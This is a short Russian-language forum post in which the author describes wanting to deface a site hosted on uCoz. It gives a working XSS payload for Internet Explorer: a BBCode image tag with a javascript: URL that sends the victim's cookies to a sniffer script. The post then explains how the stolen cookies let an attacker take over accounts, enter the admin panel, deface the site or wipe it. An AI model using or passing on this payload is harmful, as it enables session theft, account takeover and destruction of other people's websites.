Просто была необходимость задефейсить один сайтик на укоз.ру

[img ]javascript:document.images%5b0%5d.src=%22http://snif/sniffer.php?%22+document.cookie[/img]

Вот уязвимость хсс для интернет эксплорер. С помощью полученных кук можно сменить пароль жертвы (и вообще все настройки аккаунта), пройти в любой раздел,(админка,добавка/редактирование новостей и все остальное - зависит от того чьи куки стыбрил), ну а с этим легко можно сделать дефейс или снести просто весь сайт.